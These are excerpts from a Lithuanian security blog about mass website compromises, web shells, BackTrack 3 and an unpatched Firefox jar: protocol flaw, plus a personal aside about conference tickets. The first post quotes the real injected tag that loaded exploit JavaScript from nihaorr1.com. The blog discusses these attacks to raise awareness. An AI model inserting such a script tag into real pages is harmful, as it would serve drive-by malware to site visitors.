Pastaruoju metu internete įvyksta vis daugiau automatizuotų tinklalapių nulaužimų. Laužiama iš karto dideliais kiekiais. Pvz. po 10 000 vnt. iš karto. Ir nesirenkama kas laužiamas. Svarbu didelis kiekis išnaudojant tam tikrus šabloninius tinklalapių pažeidžiamumus. Atakos metu į tinklalapius įterpiamas papildomas kodas. T.y. puslapis šiek tiek patiuninguojamas. Tas tiuningas, tai yra JavaScript’as, kuris tinklalapio lankytojų sistemose ieško pažeidžiamumų ir tuos pažeidžiamumus bando išnaudoti. Pvz. jei turit neatnaujintą kokį nors Adobe Reader’į, seną QuickTime grotuvą ar Flash’o versiją, tai po apsilankymo tokiam nulaužtam puslapyje, kompiuteryje dar turėsit ir kokią nors papildomą žalingą programą. O Jūsų nuomonės apie tai niekas net ir neklaus. Po visų tokių masinių atakų, pažeisti puslapiai turėdavo žalingą kodą su Šanchajuje ar kur nors kitur Kinijoje registruotais domenais. Paskutinė ataka vyko balandžio mėn. ir į puslapius pridėdavo štai tokį kodą: <script src=http://www.nihaorr1.com/1.js></script>. Kiek iš skaitančių šį tinklaraštį nukentėjo nuo šios atakos? O kiek apie nukentėjusias įmones parašė spauda? Be problemų galim įvertinti kaipgi sekėsi lietuviškiems tinklalapiams. Aišku, kaip gi čia be google’o.

Skaityti visą įrašą…

Šiandien mane kaip reikiant sunervavo nezinau.lt su savo blogorama. Joje radau, kad bilietai į Blogin konferenciją jau pasibaigę. Kadangi šiandien pagaliau paaiškėjo, kad penktadienis man neužimtas, tai rytdieną planavau pradėti nuo bilieto pirkimo. Tai ką dabar rytoj ryte veikt? Ei, Blogin organizatoriai, kaip pirmo etapo blog’ų konkurso nugalėtojui galėtumėte kokį bilietą ir sukrapštyti. Žodžiu turiu problemą dabar gyvenime. Kur gauti bilietą?

Kad jau taip, tai pabūsiu šiandien blogas ir supažindinsiu Jus su linux live distribucija Backtrack 3. Kol kas tik beta. Bet jos autoriai sako, kad ne betoje bus tik didesnis suderinamumas su įranga.

Skaityti visą įrašą…

Jau anksčiau rašiau apie bandymus automatiniu būdu įterpinėti nutolusį programinį kodą. Ataka primityvi, bet vis gi… Ok, kas būna toliau, kai tokio bandymo atveju, per parametrą pavykstą tą kodą įterpti? Toliau būna bandoma paleisti WebShell’ą. WebShell - vartotojo sąsaja skirta valdyti serverį per naršyklę. Valdyti ne šiaip spaudžiojant pelę, bet tarsi per ssh, turint komandinę eilutę ar kitais būdais, kurie priklauso nuo situacijos. T.y. galimybės būna tokios pačios kaip normaliai prisijungus prie serverio. WebShell’ai būna geri ir blogi. Geri - skirti administratoriams jų sistemų priežiūrai. Tokių rasite daug per google, pvz. kad ir šis: http://www-personal.umich.edu/~mressl/webshell/. Norint juos paleisti, kartais reikia įdiegti papildomas bibliotekas serveryje. Blogi - serverio valdymo perėmimui po įsilaužimo. Pastarieji padaryti taip, kad visko serveryje diegti reikėtų kuo mažiau ir jų veikimui pakaktų standartinės serverio konfigūracijos. WebShell’as į serverį dedamas ir kitais būdais įsilaužus, ne tik aprašytuoju anksčiau, nes tai patogus būdas pasidaryti “atsarginį priėjimą”, jei netyčia serverio skylė butų užlopyta. Web’as yra ta terpė, kuri dažniausiai laisvai praeina pro visas apsaugos priemones, nes web’u visi naudojasi ir jam kelias paliktas atviras. Būtent dėl šios priežasties įsilaužėliai ir mėgsta tokius specializuotus WebShell’us kaip c99shell, remview ar r57shell.

Skaityti visą įrašą…

Kažkada Firefox naršyklė buvo laikoma saugia naršykle. Po to, kai ji pakankamai išpopuliarėjo, kažkur pradingo ir tas saugumas. Tuomet pradėta sakyti, kad Firefox'o autoriai labai greitai šalina jos pažeidžiamumus. Ar 10 dienų nepašalinti skylės iš naršyklės yra “greitai”? Taigi, jūsų dėmesiui vis dar nepataisytas FF jar protokolo pažeidžiamumas, kuriuo pvz. galima išlupti kontaktus iš jūsų gmail paštadėžės. Tiesa, čia taip pat išnaudojamas ir vis dar nesutvarkytas eilinis tokio tipo Google pažeidžiamumas. Sudėjus abu, gaunasi visai neblogas efektas. Spausk čia ir įsitikink pats. Tik nepamiršk prieš tai kitam Tab'e prie savo gmail'o prisijungti. Neprisijungus nesuveiks, nes šis pažeidžiamumas tavo slaptažodžio atspėti dar nemoka. Duomenys bus parodyti tik tau ir niekur nebus išsaugomi. Gražu? Tad žiūrėk ką spaudai pele internete, nes viskas gali būti ir blogiau. Šiaip jau šis jar protokolo pažeidžiamumas paskelbtas buvo dar 2007 metų vasario 8 dieną ir vis dar neištaisytas. Firefox'o komanda yra pasižadėjusi tokius dalykus šalinti per 10 dienų. Et, ir ko tik populiarumas nepridaro su naršyklėmis…